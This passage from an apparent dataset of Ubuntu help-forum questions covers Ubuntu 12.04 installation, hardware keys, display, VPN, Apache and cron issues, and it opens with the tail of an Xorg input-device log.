built-in extension security [ 25.182 ] ( ii ) initializing built-in extension xinerama [ 25.182 ] ( ii ) initializing built-in extension xfixes [ 25.182 ] ( ii ) initializing built-in extension render [ 25.182 ] ( ii ) initializing built-in extension randr [ 25.182 ] ( ii ) initializing built-in extension composite [ 25.182 ] ( ii ) initializing built-in extension damage [ 25.184 ] ( ii ) initializing extension glx [ 25.206 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 25.209 ] ( ii ) config/udev : adding input device power button ( /dev/input/event2 ) [ 25.209 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 25.209 ] ( ii ) loadmodule : `` evdev '' [ 25.210 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 25.210 ] ( ii ) module evdev : vendor= '' x.org foundation '' [ 25.210 ] compiled for 1.11.3 , module version = 2.7.0 [ 25.210 ] module class : x.org xinput driver [ 25.210 ] abi class : x.org xinput driver , version 16.0 [ 25.210 ] ( ii ) using input driver 'evdev ' for 'power button' [ 25.210 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 25.210 ] ( ** ) power button : always reports core events [ 25.210 ] ( ** ) evdev : power button : device : `` /dev/input/event2 '' [ 25.210 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 25.210 ] ( -- ) evdev : power button : found keys [ 25.210 ] ( ii ) evdev : power button : configuring as keyboard [ 25.210 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxpwrbn:00/input/input2/event2 '' [ 25.210 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 6 ) [ 25.210 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 25.210 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 25.210 ] ( ** ) option `` xkb_layout '' `` us '' [ 25.211 ] ( ii ) config/udev : adding input device video bus ( /dev/input/event4 ) [ 25.211 ] ( ** ) video bus : applying inputclass `` evdev keyboard catchall '' [ 25.211 ] ( ii ) using input driver 'evdev ' for 'video bus' [ 25.211 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 25.211 ] ( ** ) video bus : always reports core events [ 25.211 ] ( ** ) evdev : video bus : device : `` /dev/input/event4 '' [ 25.211 ] ( -- ) evdev : video bus : vendor 0 product 0x6 [ 25.211 ] ( -- ) evdev : video bus : found keys [ 25.211 ] ( ii ) evdev : video bus : configuring as keyboard [ 25.211 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0a08:00/device:06/lnxvideo:01/input/input4/event4 '' [ 25.211 ] ( ii ) xinput : adding extended input device `` video bus '' ( type : keyboard , id 7 ) [ 25.211 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 25.211 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 25.211 ] ( ** ) option `` xkb_layout '' `` us '' [ 25.212 ] ( ii ) config/udev : adding input device sony vaio keys ( /dev/input/event6 ) [ 25.212 ] ( ** ) sony vaio keys : applying inputclass `` evdev keyboard catchall '' [ 25.212 ] ( ii ) using input driver 'evdev ' for 'sony vaio keys' [ 25.212 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 25.212 ] ( ** ) sony vaio keys : always reports core events [ 25.212 ] ( ** ) evdev : sony vaio keys : device : `` /dev/input/event6 '' [ 25.212 ] ( -- ) evdev : sony vaio keys : vendor 0x104d product 0 [ 25.212 ] ( -- ) evdev : sony vaio keys : found keys [ 25.212 ] ( ii ) evdev : sony vaio keys : configuring as keyboard [ 25.212 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0a08:00/device:0a/sny5001:00/input/input6/event6 '' [ 25.212 ] ( ii ) xinput : adding extended input device `` sony vaio keys '' ( type : keyboard , id 8 ) [ 25.212 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 25.212 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 25.212 ] ( ** ) option `` xkb_layout '' `` us '' [ 25.212 ] ( ii ) config/udev : adding input device power button ( /dev/input/event0 ) [ 25.212 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 25.212 ] ( ii ) using input driver 'evdev ' for 'power button' [ 25.212 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 25.212 ] ( ** ) power button : always reports core events [ 25.212 ] ( ** ) evdev : power button : device : `` /dev/input/event0 '' [ 25.213 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 25.213 ] ( -- ) evdev : power button : found keys [ 25.213 ] ( ii ) evdev : power button : configuring as keyboard [ 25.213 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0c0c:00/input/input0/event0 '' [ 25.213 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 9 ) [ 25.213 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 25.213 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 25.213 ] ( ** ) option `` xkb_layout '' `` us '' [ 25.213 ] ( ii ) config/udev : adding input device lid switch ( /dev/input/event1 ) [ 25.213 ] ( ii ) no input driver specified , ignoring this device . [ 25.213 ] ( ii ) this device may have been added with another device file . [ 25.214 ] ( ii ) config/udev : adding input device uvc camera ( 05ca:183f ) ( /dev/input/event5 ) [ 25.214 ] ( ** ) uvc camera ( 05ca:183f ) : applying inputclass `` evdev keyboard catchall '' [ 25.214 ] ( ii ) using input driver 'evdev ' for 'uvc camera ( 05ca:183f ) ' [ 25.214 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 25.214 ] ( ** ) uvc camera ( 05ca:183f ) : always reports core events [ 25.214 ] ( ** ) evdev : uvc camera ( 05ca:183f ) : device : `` /dev/input/event5 '' [ 25.214 ] ( -- ) evdev : uvc camera ( 05ca:183f ) : vendor 0x5ca product 0x183f [ 25.214 ] ( -- ) evdev : uvc camera ( 05ca:183f ) : found keys [ 25.214 ] ( ii ) evdev : uvc camera ( 05ca:183f ) : configuring as keyboard [ 25.214 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1a.7/usb1/1-2/1-2:1.0/input/input5/event5 '' [ 25.214 ] ( ii ) xinput : adding extended input device `` uvc camera ( 05ca:183f ) '' ( type : keyboard , id 10 ) [ 25.214 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 25.214 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 25.214 ] ( ** ) option `` xkb_layout '' `` us '' [ 25.214 ] ( ii ) config/udev : adding input device hda intel mic ( /dev/input/event8 ) [ 25.214 ] ( ii ) no input driver specified , ignoring this device . [ 25.214 ] ( ii ) this device may have been added with another device file . [ 25.215 ] ( ii ) config/udev : adding input device hda intel headphone ( /dev/input/event9 ) [ 25.215 ] ( ii ) no input driver specified , ignoring this device . [ 25.215 ] ( ii ) this device may have been added with another device file . [ 25.215 ] ( ii ) config/udev : adding input device at translated set 2 keyboard ( /dev/input/event3 ) [ 25.215 ] ( ** ) at translated set 2 keyboard : applying inputclass `` evdev keyboard catchall '' [ 25.215 ] ( ii ) using input driver 'evdev ' for 'at translated set 2 keyboard' [ 25.215 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 25.215 ] ( ** ) at translated set 2 keyboard : always reports core events [ 25.215 ] ( ** ) evdev : at translated set 2 keyboard : device : `` /dev/input/event3 '' [ 25.215 ] ( -- ) evdev : at translated set 2 keyboard : vendor 0x1 product 0x1 [ 25.215 ] ( -- ) evdev : at translated set 2 keyboard : found keys [ 25.215 ] ( ii ) evdev : at translated set 2 keyboard : configuring as keyboard [ 25.215 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio0/input/input3/event3 '' [ 25.215 ] ( ii ) xinput : adding extended input device `` at translated set 2 keyboard '' ( type : keyboard , id 11 ) [ 25.215 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 25.215 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 25.215 ] ( ** ) option `` xkb_layout '' `` us '' [ 25.216 ] ( ii ) config/udev : adding input device synps/2 synaptics touchpad ( /dev/input/event10 ) [ 25.216 ] ( ** ) synps/2 synaptics touchpad : applying inputclass `` evdev touchpad catchall '' [ 25.216 ] ( ** ) synps/2 synaptics touchpad : applying inputclass `` touchpad catchall '' [ 25.216 ] ( ii ) loadmodule : `` synaptics '' [ 25.216 ] ( ii ) loading /usr/lib/xorg/modules/input/synaptics_drv.so [ 25.216 ] ( ii ) module synaptics : vendor= '' x.org foundation '' [ 25.216 ] compiled for 1.11.3 , module version = 1.6.0 [ 25.216 ] module class : x.org xinput driver [ 25.216 ] abi class : x.org xinput driver , version 16.0 [ 25.216 ] ( ii ) using input driver 'synaptics ' for 'synps/2 synaptics touchpad' [ 25.216 ] ( ii ) loading /usr/lib/xorg/modules/input/synaptics_drv.so [ 25.216 ] ( ** ) synps/2 synaptics touchpad : always reports core events [ 25.216 ] ( ** ) option `` device '' `` /dev/input/event10 '' [ 25.220 ] ( -- ) synaptics : synps/2 synaptics touchpad : x-axis range 1472 - 5728 [ 25.220 ] ( -- ) synaptics : synps/2 synaptics touchpad : y-axis range 1408 - 4548 [ 25.220 ] ( -- ) synaptics : synps/2 synaptics touchpad : pressure range 0 - 255 [ 25.220 ] ( -- ) synaptics : synps/2 synaptics touchpad : finger width range 0 - 15 [ 25.220 ] ( -- ) synaptics : synps/2 synaptics touchpad : buttons : left right [ 25.220 ] ( -- ) synaptics : synps/2 synaptics touchpad : vendor 0x2 product 0x7 [ 25.220 ] ( -- ) synaptics : synps/2 synaptics touchpad : touchpad found [ 25.220 ] ( ** ) synps/2 synaptics touchpad : always reports core events [ 25.224 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio1/input/input10/event10 '' [ 25.224 ] ( ii ) xinput : adding extended input device `` synps/2 synaptics touchpad '' ( type : touchpad , id 12 ) [ 25.224 ] ( ** ) synaptics : synps/2 synaptics touchpad : ( accel ) minspeed is now constant deceleration 2.5 [ 25.224 ] ( ** ) synaptics : synps/2 synaptics touchpad : maxspeed is now 1.75 [ 25.224 ] ( ** ) synaptics : synps/2 synaptics touchpad : accelfactor is now 0.038 [ 25.224 ] ( ** ) synps/2 synaptics touchpad : ( accel ) keeping acceleration scheme 1 [ 25.224 ] ( ** ) synps/2 synaptics touchpad : ( accel ) acceleration profile 1 [ 25.224 ] ( ** ) synps/2 synaptics touchpad : ( accel ) acceleration factor : 2.000 [ 25.224 ] ( ** ) synps/2 synaptics touchpad : ( accel ) acceleration threshold : 4 [ 25.224 ] ( -- ) synaptics : synps/2 synaptics touchpad : touchpad found [ 25.224 ] ( ii ) config/udev : adding input device synps/2 synaptics touchpad ( /dev/input/mouse1 ) [ 25.224 ] ( ** ) synps/2 synaptics touchpad : ignoring device from inputclass `` touchpad ignore duplicates '' [ 25.226 ] ( ii ) config/udev : adding input device sony vaio jogdial ( /dev/input/event7 ) [ 25.227 ] ( ii ) no input driver specified , ignoring this device . [ 25.227 ] ( ii ) this device may have been added with another device file . [ 25.227 ] ( ii ) config/udev : adding input device sony vaio jogdial ( /dev/input/mouse0 ) [ 25.227 ] ( ii ) no input driver specified , ignoring this device . [ 25.227 ] ( ii ) this device may have been added with another device file . [ 282.307 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-03af3717ff3ab439a4baaba686ccb40771cdf520.xkm
141982	changing the screen resolution on 12.04	i am running 12.04 within parallels 7 on an 11 '' macbook air . i 'm trying to set the display resolution to the native 1366 x 768 but ubuntu does n't list this as an option . how can i add the correct resolution to the options ?
141985	unable to uninstall or reinstall ubuntu desktop	the uninstall-wubi option does n't work . when i try reinstalling it they show an error and tells me to check `` wubi 12.04 rev266 '' log everything goes fine till the bottom which shows this there is another file or directory with this name . please remove it before continuing . traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 81 , in select_target_dir exception : can not install into c : \ubuntu . there is another file or directory with this name . please remove it before continuing . 05-25 15:20 debug tasklist : # cancelling tasklist 05-25 15:20 debug tasklist : # finished tasklist 05-25 15:20 error root : can not install into c : \ubuntu . there is another file or directory with this name . please remove it before continuing . traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 81 , in select_target_dir exception : can not install into c : \ubuntu . there is another file or directory with this name . please remove it before continuing . what do i do ? i 've tried the uninstall wubi option but all it shows is `` reinstall using recommended settings which does n't do anything '' okay i 've tried installing it into another hardrive and i got this traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in call file `` \lib\wubi\backends\win32\backend.py '' , line 117 , in create_uninstaller file `` \lib\wubi\backends\win32\registry.py '' , line 45 , in set_value windowserror : [ errno 5 ] access is denied 05-26 16:12 debug tasklist : # cancelling tasklist 05-26 16:12 debug tasklist : # finished tasklist 05-26 16:12 error root : [ errno 5 ] access is denied traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in call file `` \lib\wubi\backends\win32\backend.py '' , line 117 , in create_uninstaller file `` \lib\wubi\backends\win32\registry.py '' , line 45 , in set_value windowserror : [ errno 5 ] access is denied
141987	my screen brightness fn keys do n't work , and show erratic behavior	i am using ubuntu 12.04 and my computer model is viao vgn-cs16t . its a chinese computer , and its hard to find support for it . when i use the fn keys , fn+f5 and fn+f6 the computer buggs out and opens up weird things . last time it opened up firebug and selected a bunch of text . would love to use this feature of my computer . anyone have any ideas ?
141991	my multimedia keys arent working , and cause eratic behavior	i have a sony viao vgn-cs16t and the multimedia keys at the top cause some crazy behavior . when i hit any of them , the trackpad stops working properly , starts clicking in crazy ways , selecting on its own , and the right click wont work . there is a capture button which opens random applications , a play , rewind , forward , av mode volume up and down buttons . i 'd love to have this functionality . thanks !
141993	errors when attempting to install vim on ubuntu 12.04	i have installed ubuntu 12.04 in my computer few days back . from then i tried to install few programs through ubuntu software center but it showed that no internet connection even though i was connected to internet . then i came to know that vi editor will be required to set the system configuration in which i will be able to save my password and proxy . apart from that i also tried to install the programs through terminal but still same problem occurred as it says this is not a candidate for install . i tried to install vim using command sudo apt-get instal vim-nox but it shows that broken package and showed many failures . please help me out of this ... . thank you
142002	generic solution to prevent a long cron job from running in parallel ?	i am looking for a simple and generic solution that would allow you to execute any script or application in crontab and prevent it from running twice . the solution should be independent on the executed command . i assume it should look like lock & & ( command ; unlock ) where lock will return false if there was another lock . the second part would be like if it acquired the lock , run command and unlock after command is executed , even if it returns error .
142004	can not boot without usb stick after successful install	i installed ubuntu yesterday via a bootable usb drive , created with unetbootin . everything went very well , but now the computer does not boot unless the usb drive is plugged in . if it 's not , then when the computer boots , the boot sequence screen just appears and if i select the hard drive , it will just reboot and go back to this boot sequence screen , until i plug in the usb drive . any ideas ? thanks a lot for your help ! update : having some valuable data on the machine , i would prefer a solution that does n't involve reinstalling , but from the first replies , i guess this may be what i have to do eventually . thanks ! gm == edit : output of sudo fdisk -l below disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x000742dc device boot start end blocks id system /dev/sda1 2048 1449474047 724736000 83 linux /dev/sda2 1449476094 1465147391 7835649 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 1449476096 1465147391 7835648 82 linux swap / solaris disk /dev/sdb : 4009 mb , 4009754624 bytes 255 heads , 63 sectors/track , 487 cylinders , total 7831552 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdb1 * 8064 7831551 3911744 b w95 fat32 == edit2 bootinfo output : http : //paste.ubuntu.com/1006423
142006	my screen brightness fn keys do n't work .	i have a viao vgn-cs16t . whenever my computer wakes from sleep , the keyboard does not function . also , i can not click and the trackpad is erratic . it might be related to the multimedia keys above the keyboard . whenever i touch them , the trackpad goes crazy . i already asked about that in another post .
142007	ca n't install aircrack-ng	whenever i attempt to install aircrack-ng in terminal i get the following error : package aircrack-ng is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : iw e : package 'aircrack-ng ' has no installation candidate '' i 'm new to buntu and so have no idea whuat to do . : p any suggestions ? and if so try your best to do it in english terms . : )
142008	forticlient ssl vpn binary not running	i 've got a mac running vmware fusion with ubuntu 10.10 in that . i 'm currently using the fortinet client from osx , but that client is buggy , every time my mac sleeps i need to reboot to get the ssl/vpn connection working again . because i only need the ssl/vpn connection from ubuntu i tried installing the fortinet ssl/vpn client in ubuntu . but i was unsuccesfull . i took the following steps : downloaded the .tar.gz $ tar -xvzf forticlientsslvpn_linux_4.0.2012.tar.gz $ cd forticlientsslvpn $ ./forticlientsslvpn then i get the notice : $ bash : ./forticlientsslvpn : no such file or directory ( mind you , the file is there ) and now i 'm stuck , what direction can i troubleshoot into ? notes : i 've tried a couple of different versions : forticlientsslvpn_linux_4.0.2010 forticlientsslvpn_linux_4.0.2012 forticlientsslvpn_linux_4.0.2147 related question : fortinet ssl vpn client and ubuntu 12.04
142012	how to use gettext to make qml files translatable	i 'd like to write a qtquick app based on python ( pyside ) and qml . i know qt apps have got their own translation technology , but i would like to stick to gettext for this one . i 'd like to know if it 's possible to : mark strings for translation in qml files in a way gettext tools can extract them into a .pot file have gettext translate qml files at runtime . i know this is done in the unity 2d code , in c++ , so i 'm wondering how it can be done with python . note : i 'm talking about using exclusively gettext at runtime , not about converting between gettext and qt linguist formats .
142014	hide home folders for users	i have a ubuntu desktop edition set up as server at my home and this installation has a lot of users . i hav a administrator account and all other accounts are standard accounts . at the moment everyone can see the other peoples home directories and the files in it . i would like to change this that the users can only access their own home directories . but i would like to still be able to see the other users home directories . can someone tell me how i can do this ? thank you .
142016	`` sorry , ubuntu 12.04 has experienced an internal error . ''	i have recently upgraded to precise and had some errors . it seems to be quite random and with differences in the error reports . i have duly sent the reports hoping the system will have found the problem and sorted itself out . after the second error i am following the wizards ( software ... ) advice and seeking help . the 1st time it happened i jotted down the following : executablepath /usr/lib/tracker/tracker-extract launchpad bug 950765 amd64 the second time the following : executablepath /usr/share/appart/appart-gpu-error-intel.py '' possible gpu hang ... ... .. '' sandybridge-m-gt2 launchpad bug 981261 if there is anyone that can help it is much appreciated . i did not really want to upgrade at this stage , but was forced to due to the latest version of python-numpy in precise . you win some , you loose some ... . jacques i am using a pavilion dv6 notebook and 64bit ubuntu 12.04 lts
142017	brightness keys f4 and f5 not working on dell xps 15.6 laptop	please provide me a solution how to fix this ?
142023	dell inspiron n5110 battery lasts only for 1.5 hours as opposed to 4 hours on windows 7	i 've a dell inspiron n5110 laptop with the following specs : i5 processor 4 gb ram nvidia geforce gt540m ubuntu 12.04lts my laptop is overheating and the battery is lasting for only about 1.5 hours . i had checked if the battery indicator was problematic but it turned out it was n't . i drained the battery to it 's least possible value and that came to around 1 hr 40 minutes . in fact , i 've the same problem with debian and xubuntu as well . i would like to get some proper solution for this . fyi : i 've been having this problem since ubuntu 11.04 but i 'm not able to solve this in spite of trying various fixes like reducing brightness , removing startup apps , updating kernel and what not ? . i 'm a big fan of ubuntu but this problem is stopping me from using ubuntu and i 'm using win7 for 90 % of the time .
142025	vlc and all main ubuntu sofwares are unauthenticated	then how i 'll install all these software including vlc and mplayer in ubuntu 10.04 lts . ?
142030	ca n't find iso file to burn cd	i want to use ubuntu to format an external hdd to ext3 , but not to run on my pc . i downloaded infrarecorder and the windows installer download on the ubuntu download page . after rebooting infrarecorder shows up in my program list but not ubuntu ( although when re-booting i was prompted if i wanted to use ubuntu or windows as my os ) . in my ubuntu folder there is a zipped installation file , so apparently ubuntu is not running on my pc . should i unzip and install this file and then select the image file to burn on cd , or would i be better off uninstalling the windows version and downloading the desktop 12.04 lts version ? i am using windows xp sp3 as my os and as imperfect as windows is i do n't want to deal with conflicts on the pc if i load ubuntu hence my caution . thank you
142033	ca n't move screenlets when position is set to `` keep above ''	i 've installed some screenlets and treat them as widgets . i did enable `` widgets layer '' plug-in in ccsm . but i got a little problem here , when i set position for the widget always on top of windows by checking `` keep above '' option , i ca n't move the widget anymore , but when set it to `` keep below '' , no problem . is this a bug ? if so , how could i fix it ?
142034	ctrl + < not working with guake	i was using ctrl+ < as a shortcut to show guake in 11.10 . now when i define the shortcut it recognizes the combination but when i try to use it it does n't work . instead , it recognizes < as being the shortcut . this is happening in more than one computer . any ideas why ?
142035	how to make `` chameleonic ambiance script '' select a lighter hue for dark wallpapers ?	i just started using an amazing script that makes the default `` ambiance '' theme use that selected color . more details can be found here i find this really amazing . but with my wallpaper being as shown below , the selection color , progress-bars color as after running the script are too dark ( that can be seen in the following screenshot ) . i 've learnt that what is done is the average color from the wallpaper is selected and then its tint is used ( which is always a darker tint ) . so can i make this algorithm or whatever select a lighter tint of the average color ? ? or can it be made to select the lightest color instead of the average color from the wallpaper ? ?
142037	ubuntu button missing on desktop	i installed ubuntu 12.04 from scratch and i 'm missing the ubuntu button , so i can not go into system - > users and groups for instance . what could be the problem . i installed it on 2 netbooks , and they both share the same problem . kind regards , ronny
142038	installing ubuntu 12.04 failing	i am frustrated . i ca n't get ubuntu installed . i wrote the .iso file into a dvd and booted from it . i choose wubi.exe file . i selected demo install but the system reboots quickly without copying any files , then it restarted , and booted from cd . i have 3 choices . installing ubuntu along side windows , replace windows with ubuntu , and something else . when i choose installing ubuntu along side windows , my pc restarts and does not do anything . when i choose something else , i see a page for installing ubuntu in a partition . i choose a partition , and change the format of this partition to linux partition and format it to start installing ubuntu . when the installing complete i restart pc , the ubuntu added to my os list but when i choose it i see error like this : please insert win7 cd and repair the driver , file : /ubuntu/winboot/wabilder status ; 0x00000f info : the selected entry could not be load because the application missing or corrupt where is the problem ?
142043	what 's the maximum amount of ram i can use on an specific hardware	i 've an asus u31sd notebook with an i5-2430m cpu . the asus site says that the maximum ram is 8 gb , but intel 's says my cpu supports 16 gb . what is the maximum ram i can use on this system under ubuntu ?
142048	how to uninstall ubuntu 12.04 in dell inspirion 14r laptop ?	how to uninstall ubuntu 12.04 completely from dell inspirion 14r laptop ? i installed it with the iso file writing in a dvd disc . please advise me upon how to uninstall ubuntu completely without removing any information from windows 7
142050	does ubuntu log when usb devices are connected ?	when i connect a usb drive to an ubuntu os , would there be a text file which contains details of that connection and if so , where is that file located ? what is the name of that file ?
142051	ubuntu one for windows client : `` attributeerror '' messages	this is driving me crazy . it used to work fine , then all of a sudden i am seeing this : attributeerror '' 'nonetype ' object has no attribute 'get_homedir ' '' attributeerror '' 'nonetype ' object has no attribute 'get_rootdir ' '' does anyone know what i can do next ?
142054	why does installing gnome shell extensions from extensions.gnome.org fail silently ?	on a fresh ubuntu install ( 12.04 , 64-bit ) , after installing gnome-shell , i 've tried to install some extensions from extensions.gnome.org but got no result . i 've tried with firefox and chromium and got the same issue . open any extension page on extensions.gnome.org . switch extension to `` on '' . agree with confirmation about installation . nothing happens and nothing has been installed ( .local/share/gnome-shell/extensions is empty ) . i 've checked .xsession-errors , firefox 's javascript console , gnome-shell console errors ( alt-f2 + looking glass ) . there is n't any trace of any error .
142056	ca n't use external monitor with ubuntu 12.04 , fn+f5 does n't work	hi i have an asus eeepc 901 and now i installed lubuntu 12.04 on it . everything works fine except i ca n't use external monitors . if i press fn+f5 which used to be the right keys for eeebuntu ( the previous distro ) nothing happens , the monitor does n't get a signal . what can i do ?
142061	can i completely remove gnome and leave xmonad ?	i 've installed xmonad . i 'm trilled with it . i can now use it as my one and only wm . i 'm just wondering is it going to work without problems if i totally remove gnome . i 'm using ubuntu 10.04 .
142065	changing afp to smb	since upgrading to 12.04 nautilus connects to my network drive using afp . this works some of time but is very slow ans sometimes just crashes nautilus . i 'd like to use smb instead but even though i 've now installed samba i 've no idea on how to get nautilus to use it instead of afp ?
142077	how do i install vnc on a minimal build for xbmc ?	i have a minimal xbmc build on top of ubuntu sever with no packaged selected installed but the following packages : xbmc , xorg pulseaudio , and lightdm . how do i setup a working vnc server without having a de installed , and when using a xbmc-session because the app i use on my phone hipporemote uses vnc keyboard presses to navigate xbmc .
142081	how do i delete the list of bluetooth dun connections ?	i have ended up with a huge list of dun connections , which are duplicates of a single device . any idea how i should delete them ? i looked around in /etc/bluetooth and a few directories in my home directory .
142084	apache gives 403 forbidden	server : ubuntu 12.04 w/ lamp i can access the default index.html , but i created a symbolic link to a folder in my dropbox . whenever i try to access 192.168.2.6/joomla ( joomla is the symbolic link ) , i get a 403 error . editing my httpd.conf according to this question did n't work . i can post conf files , etc , just ask . i 've tried using chmod to allow all permissions on the files in question , but that did n't help . also , i deleted the default index.html to force apache to show the www directory . it shows , but is empty ( symbolic link does n't show up ) output from ls -lsrah ( in joomla ) : total 7.6m -rwxrwxr-x 1 somekittens somekittens 865 mar 31 18:03 robots.txt -rwxrwxr-x 1 somekittens somekittens 1.3k mar 31 18:03 index.php -rwxrwxr-x 1 somekittens somekittens 1.7k mar 31 18:03 web.config.txt -rwxrwxr-x 1 somekittens somekittens 1.8k mar 31 18:07 joomla.xml -rwxrwxr-x 1 somekittens somekittens 3.1k mar 31 18:03 htaccess.txt drwxrwxr-x 2 somekittens somekittens 4.0k mar 31 18:03 tmp drwxrwxr-x 6 somekittens somekittens 4.0k mar 31 18:03 templates drwxrwxr-x 13 somekittens somekittens 4.0k mar 31 18:03 plugins drwxrwxr-x 26 somekittens somekittens 4.0k mar 31 18:03 modules drwxrwxr-x 15 somekittens somekittens 4.0k mar 31 18:03 media drwxrwxr-x 2 somekittens somekittens 4.0k mar 31 18:03 logs drwxrwxr-x 7 somekittens somekittens 4.0k mar 31 18:03 libraries drwxrwxr-x 4 somekittens somekittens 4.0k mar 31 18:03 language drwxrwxr-x 10 somekittens somekittens 4.0k mar 31 18:03 installation drwxrwxr-x 2 somekittens somekittens 4.0k mar 31 18:03 includes drwxrwxr-x 4 somekittens somekittens 4.0k mar 31 18:03 images drwxrwxr-x 13 somekittens somekittens 4.0k mar 31 18:03 components drwxrwxr-x 2 somekittens somekittens 4.0k mar 31 18:03 cli drwxrwxr-x 2 somekittens somekittens 4.0k mar 31 18:03 cache drwxrwxr-x 10 somekittens somekittens 4.0k mar 31 18:03 administrator drwxrwxr-x 5 somekittens somekittens 4.0k may 25 08:51 .. drwxrwxr-x 17 somekittens somekittens 4.0k may 25 08:53 . -rwxrwxr-x 1 somekittens somekittens 4.2k mar 31 18:03 readme.txt -rwxrwxr-x 1 somekittens somekittens 18k mar 31 18:03 license.txt -rwxrwxr-x 1 somekittens somekittens 7.5m mar 31 18:18 joomla_2.5.4-stable-full_package.zip output from ls -lsrah ( in /var/www/ ) : somekittens @ kittenstest : /var/www $ ls -lsrah total 7.5m lrwxrwxrwx 1 root root 41 may 25 09:39 joomla - > /home/somekittens/dropbox/project/joomla/ drwxr-xr-x 13 root root 4.0k may 24 20:50 .. drwxr-xr-x 2 root root 4.0k may 25 10:08 . /etc/apache2/httpd.conf < virtualhost indextj:80 > serveradmin webmaster @ indextj documentroot /home/somekittens/dropbox/project/joomla < directory / > options +followsymlinks -symlinksifownermatch allowoverride all < /directory >
142090	how to get updated ip address mailed to me in dnsexit ?	i 'm using dnsexit on my ubuntu server ( natty 11.04 ) and have installed the ipupdate rpm file and did an apt-get install for chkconfig to enable the ipupdate . i 'd like to get an email whenever the ip address changes , so that i can ssh into the box using putty ( because i ca n't unless i know the current ip address ) . the current ip address is stored in /tmp/dnsexit-ip.txt , and i 'd like to , whenever that file changes , to mail the contents of that file and the contents of /var/log/dnsexit.log ( which contains a history of the ip changes ) to my email address . how can i accomplish this task ? i 'm thinking that a cronjob will be the solution , but i 'm not sure how to do this .
142091	how do i fix this error i get when trying to run ds9 ?	ds9 : error while loading shared libraries : libxss.so.1 : can not open shared object file : no such file or directory please help to fix the error . my ds9 is in /usr/local/bin/ds9
142092	how do i run an executable file with a double click ?	i 'm trying to run an executable ( testdisk ) but double click does n't work . the only way is to run : sudo ./testdisk from terminal . but i 'd like to open executables with double click in future . how can i do this ?
142093	pdf does not open	when i create a pdf file from calc ( libre office 3.5.3.2 ) i can not open that file ( with evince 3.4.0 or other pdf viewer ) this when the calc file comes from a different computer ( ubuntu 12.04 - 64bits ) - even after the calc file has been saved on my own computer . this pdf file is anyhow created properly and it can be opened by any other pc - yet it can not be opened by my own computer . no problem - i can open the pdf file - when the pdf is from my own created calc file starting from zero . authorisation conflicts for pdf of ods files coming from different source ? this after recent updates - this problem has never happened before - i hope next updates will fix this my system 12.04 - 32bit thanks
